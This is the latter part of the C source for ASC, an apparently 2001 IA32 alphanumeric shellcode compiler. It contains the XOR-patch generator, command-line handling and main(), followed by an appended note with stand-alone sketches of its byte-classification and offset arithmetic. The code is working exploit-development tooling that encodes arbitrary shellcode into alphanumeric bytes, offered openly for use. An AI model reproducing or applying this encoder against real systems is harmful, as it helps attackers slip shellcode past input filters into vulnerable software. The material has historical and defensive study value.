  switch(size) {
  case 1:
   xPB1=alphanumeric_get_complement(PB1);
   PUSHb(s,XOR(PB1,xPB1));        /* push ~xPB1 */
   POPr(s,reg);                   /* pop reg */
   PB1=xPB1;                      /* modify into the original shellcode */
   XORsib8(s,base,EBP,disp8,reg); /* xor [base+2*ebp+disp8],reg => xor xPB1,~xPB1 */
   break;
  case 2:
   xPB1=alphanumeric_get_complement(PB1);
   xPB2=alphanumeric_get_complement(PB2);
   PUSHw(s,WORD(XOR(PB2,xPB2),XOR(PB1,xPB1))); /* push ~xPB2 ~xPB1 */
   O16(s);POPr(s,reg); /* pop reg */
   PB1=xPB1;           /* modify into the original shellcode */
   PB2=xPB2;
   O16(s);XORsib32(s,base,EBP,disp8,reg); /* xor [base+2*ebp+disp8],reg => xor xPB2 xPB1,~xPB2 ~xPB1 */
   break;
  case 4:
   xPB1=alphanumeric_get_complement(PB1);
   xPB2=alphanumeric_get_complement(PB2);
   xPB3=alphanumeric_get_complement(PB3);
   xPB4=alphanumeric_get_complement(PB4);
   PUSHd(s,DWORD(XOR(PB4,xPB4),XOR(PB3,xPB3),XOR(PB2,xPB2),XOR(PB1,xPB1))); /* push ~xPB4 ~xPB3 ~xPB2 ~xPB1 */
   POPr(s,reg); /* pop reg */
   PB1=xPB1;    /* modify into the original shellcode */
   PB2=xPB2;
   PB3=xPB3;
   PB4=xPB4;
   XORsib32(s,base,EBP,disp8,reg); /* xor [base+2*ebp+disp8],reg => xor xPB4 xPB3 xPB2 xPB1,~xPB4 ~xPB3 ~xPB2 ~xPB1 */
   break;
  }
  break;
 }

 /* if needed, apply a NOT to the patched bytes of the shellcode */
 if ((category==CATEGORY_ALPHA_NOT)||(category==CATEGORY_XOR_NOT)) {
  reg=alphanumeric_get_register(M_EDX|M_ESI);
  switch(size) {
  case 1:
   XORsib8(s,base,EBP,disp8,reg); /* xor [base+2*ebp+disp8],dl/dh */
   break;
  case 2:
   O16(s);XORsib32(s,base,EBP,disp8,reg); /* xor [base+2*ebp+disp8],dx/si */
   break;
  case 4:
   XORsib32(s,base,EBP,disp8,reg); /* xor [base+2*ebp+disp8],edx/esi */
   break;
  }
 }

 return 0;
}


/* generate the patch and the original shellcode */
/* ============================================= */
int alphanumeric_patches_generate(struct Sshellcode *output,struct Sshellcode *input) {
 struct Sshellcode *out,*in; /* input and output codes */
 struct Sshellcode *best; /* last best shellcode */
 struct Sshellcode *patcher; /* patches code */
 int alpha_begin,alpha_end; /* offsets of the patchable part */
 int base; /* base register */
 unsigned char *disp8_begin; /* pointer to the current first disp8 */
 unsigned char disp8;
 int category,size,i,j;

 if (input==NULL) return -1;
 if (output==NULL) return -1;

 /* get the offset of the first and last non alphanumeric bytes */
 for (alpha_begin=0;alpha_begin<input->size;alpha_begin++) {
  if (!alphanumeric_check(input->opcodes[alpha_begin])) break;
 }
 if (alpha_begin>=input->size) { /* if patching is not needed */
  shellcode_cat(output,input);
  return 0;
 }
 for (alpha_end=input->size-1;alpha_end>alpha_begin;alpha_end--) {
  if (!alphanumeric_check(input->opcodes[alpha_end])) break;
 }

 base=alphanumeric_get_register(M_EBX|M_EDI);
 best=shellcode_malloc();
 disp8_begin=ALPHANUMERIC_BYTES;

 while (*disp8_begin!=0) { /* loop for all possible disp8 values */
  disp8=*disp8_begin;

  /* allocate all shellcodes */
  out=shellcode_malloc();
  shellcode_cpy(out,output);
  in=shellcode_malloc();
  shellcode_cpy(in,input);
  patcher=shellcode_malloc();

  i=alpha_begin;
  size=0;
  while (i<=alpha_end) { /* loop into our original shellcode */
   /* increment the offset if needed */
   for (j=0;j<size;j++) {
    if (alphanumeric_check(disp8+1)) {
     disp8++;
    }
    else INCr(patcher,base); /* inc base */
   }

   category=alphanumeric_patches_get_category(in->opcodes[i]);
   size=1; /* by default, we have 1 byte of the same category */

   /* extend the run while the next bytes share the category (4 bytes max) */
   while ((i+size<=alpha_end)&&(size<4)&&(alphanumeric_patches_get_category(in->opcodes[i+size])==category)) size++;
   if (size==3) size=2; /* impossible to XOR 3 bytes */

   /* patch those bytes */
   alphanumeric_patches_generate_xor(patcher,category,&in->opcodes[i],size,base,disp8);

   i+=size;
  }

  alphanumeric_patches_generate_initialization(out,patcher->size,alpha_begin,base,*disp8_begin); /* create a valid initialization shellcode */

  shellcode_cat(out,patcher);
  shellcode_cat(out,in);

  if ((best->size==0)||(out->size<best->size)) shellcode_cpy(best,out); /* if this is a more interesting shellcode, we save it */

  /* free the temporary shellcodes of this iteration */
  shellcode_free(out);
  shellcode_free(in);
  shellcode_free(patcher);
  disp8_begin++;
 }

 shellcode_cpy(output,best);
 shellcode_free(best);
 return 0;
}

/******************************************************************************/

/* +------------------------------------------------------------------------+ */
/* |                          INTERFACE FUNCTIONS                           | */
/* +------------------------------------------------------------------------+ */

void print_syntax() {
 fprintf(stderr,"ASC - IA32 Alphanumeric Shellcode Compiler\n");
 fprintf(stderr,"==========================================\n");
 fprintf(stderr,"SYNTAX  : asc [options] <input file[.c]>\n");
 fprintf(stderr,"COMPILATION OPTIONS :\n");
 fprintf(stderr," -a[ddress] stack|<r32>     : address of shellcode (default=stack)\n");
 fprintf(stderr," -m[ode] stack|patches      : output shellcode build mode (default=patches)\n");
 fprintf(stderr," -s[tack] call|jmp|null|ret : method to return to original code on the stack\n");
 fprintf(stderr,"                              (default=null)\n");
 fprintf(stderr,"DEBUGGING OPTIONS :\n");
 fprintf(stderr," -debug-start               : breakpoint to start of compiled shellcode\n");
 fprintf(stderr," -debug-build-original      : breakpoint to building of original shellcode\n");
 fprintf(stderr," -debug-build-jump          : breakpoint to building of stack jump code\n");
 fprintf(stderr," -debug-jump                : breakpoint to stack jump\n");
 fprintf(stderr," -debug-original            : breakpoint to start of original shellcode\n");
 fprintf(stderr,"INPUT/OUTPUT OPTIONS :\n");
 fprintf(stderr," -c[har] <char[] name>      : name of C input array (default=first array)\n");
 fprintf(stderr," -f[ormat] bin|c            : output file format (default=bin)\n");
 fprintf(stderr," -o[utput] <output file>    : output file name (default=stdout)\n");



 fprintf(stderr,"\n");
 fprintf(stderr,"ASC 0.9.1                                                    rix@hert.org @2001\n");
 exit(1);
}


void print_error() {
 perror("Error ASC");
 exit(1);
}

/* +------------------------------------------------------------------------+ */
/* |                             MAIN PROGRAM                               | */
/* +------------------------------------------------------------------------+ */

#define STACK (REGISTERS+1)

#define INPUT_FORMAT_BIN 0
#define INPUT_FORMAT_C 1

#define OUTPUT_FORMAT_BIN 0
#define OUTPUT_FORMAT_C 1

#define OUTPUT_MODE_STACK 0
#define OUTPUT_MODE_PATCHES 1

#define STACK_MODE_CALL 0
#define STACK_MODE_JMP 1
#define STACK_MODE_NULL 2
#define STACK_MODE_RET 3


int main(int argc, char **argv) {
 char *input_filename=NULL,*output_filename=NULL;
 struct Sshellcode *input=NULL,*output=NULL,*stack=NULL;

 char input_format=INPUT_FORMAT_BIN;
 char *input_variable=NULL;
 char address=STACK;
 char output_format=OUTPUT_FORMAT_BIN;
 char output_mode=OUTPUT_MODE_PATCHES;
 char stack_mode=STACK_MODE_NULL;

 int debug_start=0;
 int debug_build_original=0;
 int debug_build_jump=0;
 int debug_jump=0;
 int debug_original=0;

 int ret,l;


 /* command line parameters definition */
 #define SHORT_OPTIONS "a:c:f:m:o:s:"
 struct option long_options[]={
  /* {"name",has_arg,&variable,value} */
  {"address",1,NULL,'a'},
  {"mode",1,NULL,'m'},
  {"stack",1,NULL,'s'},

  {"debug-start",0,&debug_start,1},
  {"debug-build-original",0,&debug_build_original,1},
  {"debug-build-jump",0,&debug_build_jump,1},
  {"debug-jump",0,&debug_jump,1},
  {"debug-original",0,&debug_original,1},

  {"char",1,NULL,'c'},
  {"format",1,NULL,'f'},
  {"output",1,NULL,'o'},

  {0,0,0,0}
 };
 int c;
 int option_index=0;


 /* read command line parameters */
 opterr=0;
 while ((c=getopt_long_only(argc,argv,SHORT_OPTIONS,long_options,&option_index))!=-1) {
  switch (c) {
  case 'a':
   if (!strcmp(optarg,"eax")) address=EAX;
   else if (!strcmp(optarg,"ebx")) address=EBX;
   else if (!strcmp(optarg,"ecx")) address=ECX;
   else if (!strcmp(optarg,"edx")) address=EDX;
   else if (!strcmp(optarg,"esp")) address=ESP;
   else if (!strcmp(optarg,"ebp")) address=EBP;
   else if (!strcmp(optarg,"esi")) address=ESI;
   else if (!strcmp(optarg,"edi")) address=EDI;
   else if (!strcmp(optarg,"stack")) address=STACK;
   else print_syntax();
   break;
  case 'c':
   input_format=INPUT_FORMAT_C;
   input_variable=optarg;
   break;
  case 'f':
   if (!strcmp(optarg,"bin")) output_format=OUTPUT_FORMAT_BIN;
   else if (!strcmp(optarg,"c")) output_format=OUTPUT_FORMAT_C;
   else print_syntax();
   break;
  case 'm':
   if (!strcmp(optarg,"stack")) output_mode=OUTPUT_MODE_STACK;
   else if (!strcmp(optarg,"patches")) output_mode=OUTPUT_MODE_PATCHES;
   else print_syntax();
   break;
  case 'o':
   output_filename=optarg;
   break;
  case 's':
   output_mode=OUTPUT_MODE_STACK;
   if (!strcmp(optarg,"call")) stack_mode=STACK_MODE_CALL;
   else if (!strcmp(optarg,"jmp")) stack_mode=STACK_MODE_JMP;
   else if (!strcmp(optarg,"null")) stack_mode=STACK_MODE_NULL;
   else if (!strcmp(optarg,"ret")) stack_mode=STACK_MODE_RET;
   else print_syntax();
   break;
  case 0: /* long option set variable */
   break;
  case '?': /* error option character */
  case ':': /* error option parameter */
  default:
   print_syntax();
  }
 }

 if (optind+1!=argc) print_syntax(); /* exactly one input file is expected */
 input_filename=argv[optind];
 /* detect the input file format */
 l=strlen(input_filename);
 if ((l>2)&&(input_filename[l-2]=='.')&&(input_filename[l-1]=='c')) input_format=INPUT_FORMAT_C;

 random_initialize();
 input=shellcode_malloc();
 output=shellcode_malloc();


 /* read input file */
 if (debug_original) INT3(input);
 fprintf(stderr,"Reading %s ... ",input_filename);

 switch(input_format) {
 case INPUT_FORMAT_BIN:
  ret=shellcode_read_binary(input,input_filename);
  break;
 case INPUT_FORMAT_C:
  ret=shellcode_read_C(input,input_filename,input_variable);
  break;
 }
 if (ret==-1) {
  fprintf(stderr,"\n");
  print_error();
 }
 if (!debug_original) fprintf(stderr,"(%d bytes)\n",input->size);
 else fprintf(stderr,"(%d bytes)\n",input->size-1);


 if (debug_start) INT3(output);

 /* obtain the shellcode address */
 if (address==STACK) address=alphanumeric_get_address_stack(output);
 alphanumeric_initialize_registers(output,address);

 /* generate the original shellcode */
 if (debug_build_original) INT3(output);
 switch(output_mode) {
 case OUTPUT_MODE_STACK:
  alphanumeric_stack_generate(output,input);

  if (stack_mode!=STACK_MODE_NULL) { /* if jump building needed */
   stack=shellcode_malloc();
   if (debug_jump) INT3(stack);
   switch(stack_mode) {
   case STACK_MODE_CALL:
    CALL_ESP(stack);  /* call esp */
    break;
   case STACK_MODE_JMP:
    JMP_ESP(stack);   /* jmp esp */
    break;
   case STACK_MODE_RET:
    PUSHr(stack,ESP); /* push esp */
    RET(stack);       /* ret */
    break;
   }
   if (debug_build_jump) INT3(output);
   alphanumeric_patches_generate(output,stack);
   shellcode_free(stack);
  }
  else { /* no jump building needed */
   if (debug_jump) INT3(output);
  }
  break;

 case OUTPUT_MODE_PATCHES:
  alphanumeric_patches_generate(output,input);
  break;
 }


 /* print shellcode to the screen */
 fprintf(stderr,"Shellcode (%d bytes):\n",output->size);
 shellcode_print(output);
 fclose(stdout);
 fprintf(stderr,"\n");

 /* write output file */
 if (output_filename) {
  fprintf(stderr,"Writing %s ...\n",output_filename);

  switch(output_format) {
  case OUTPUT_FORMAT_BIN:
   ret=shellcode_write_binary(output,output_filename);
   break;
  case OUTPUT_FORMAT_C:
   ret=shellcode_write_C(output,output_filename);
   break;
  }
  if (ret==-1) {
   shellcode_free(input);
   shellcode_free(output);
   print_error();
  }
 }

 shellcode_free(input);
 shellcode_free(output);
 fprintf(stderr,"Done.\n");
 return 0;
}

/******************************************************************************/
<-->
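
A note on the byte-level logic used by asc.c. The stand-alone sketch below
is not part of the compiler. It restates, under hypothetical names
(classify, find_xor_pair, split_runs), three ideas the stack mode relies
on: sorting a byte into a category, writing a byte below 0x80 as the XOR of
two alphanumeric bytes, and cutting the original shellcode, from its last
byte to its first, into runs of at most 4 bytes of the same category. It
uses nothing from asc.c, and it scans deterministically where asc.c draws
random bytes, so take it as an illustration rather than as the author's
code.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical names: none of these identifiers come from asc.c. */
enum cat { CAT_00, CAT_FF, CAT_ALPHA, CAT_XOR, CAT_ALPHA_NOT, CAT_XOR_NOT };

/* 1 if c is in '0'-'9', 'A'-'Z' or 'a'-'z' */
int is_alnum(unsigned char c) {
 return (c>='0'&&c<='9')||(c>='A'&&c<='Z')||(c>='a'&&c<='z');
}

/* same decision order as the stack-mode categorization */
enum cat classify(unsigned char c) {
 if (c==0x00) return CAT_00;
 if (c==0xFF) return CAT_FF;
 if (is_alnum(c)) return CAT_ALPHA;
 if (c<0x80) return CAT_XOR;
 /* c>=0x80: look at the inverted byte instead */
 return is_alnum((unsigned char)~c) ? CAT_ALPHA_NOT : CAT_XOR_NOT;
}

/* find alphanumeric a,b with (a XOR b)==c, scanning in ASCII order */
/* returns 1 on success, 0 if no such pair exists (any c>=0x80)      */
int find_xor_pair(unsigned char c,unsigned char *a,unsigned char *b) {
 int x;

 for (x='0';x<='z';x++) {
  if (is_alnum((unsigned char)x)&&is_alnum((unsigned char)(x^c))) {
   *a=(unsigned char)x;
   *b=(unsigned char)(x^c);
   return 1;
  }
 }
 return 0;
}

/* walk buf from its last byte to its first and cut it into runs of */
/* 1..4 bytes sharing one category; run lengths go to runs[]        */
size_t split_runs(const unsigned char *buf,size_t len,
                  size_t *runs,size_t max_runs) {
 size_t n=0;
 size_t left=len; /* bytes not yet consumed */

 assert(buf!=NULL&&runs!=NULL);
 while (left>0&&n<max_runs) {
  enum cat k=classify(buf[left-1]);
  size_t size=1;

  while (size<4&&size<left&&classify(buf[left-1-size])==k) size++;
  runs[n++]=size;
  left-=size;
 }
 return n;
}
```

For instance, find_xor_pair(0x0b,&a,&b) gives a='2' and b='9', since
0x32 XOR 0x39 = 0x0b. A byte such as 0xcd is classified CAT_ALPHA_NOT,
because its inverse 0x32 is already alphanumeric.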

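In patches mode, every patch instruction addresses its target as
[base+2*ebp+disp8], so the distance left for EBP to cover must be both
non-negative and even. The sketch below isolates that arithmetic as it
appears in alphanumeric_patches_generate_initialization(). The helper name
ebp_for_offset and its interface are hypothetical and exist only for this
illustration.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical helper, not part of asc.c.                              */
/* raw  : distance in bytes from the base register to the first byte   */
/*        to patch, minus disp8                                         */
/* fill : receives the number of padding bytes to add before the       */
/*        patcher (asc.c pads with "inc ecx")                           */
/* returns the value to load into EBP                                   */
int ebp_for_offset(int raw,int *fill) {
 assert(fill!=NULL);
 *fill=0;
 if (raw<0) { /* target sits before base+disp8: pad up to zero */
  *fill=-raw;
  raw=0;
 }
 if (raw&1) { /* 2*ebp is always even: pad with one more byte */
  (*fill)++;
  raw++;
 }
 return raw/2;
}
```

As an example, with disp8='0' (0x30) and a target 53 bytes after the base,
raw is 5: one padding byte is added and EBP is set to 3, so that
base+2*3+0x30 points 54 bytes after the base, where the target now sits.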
|EOF|--------------------------------------------------------------------|
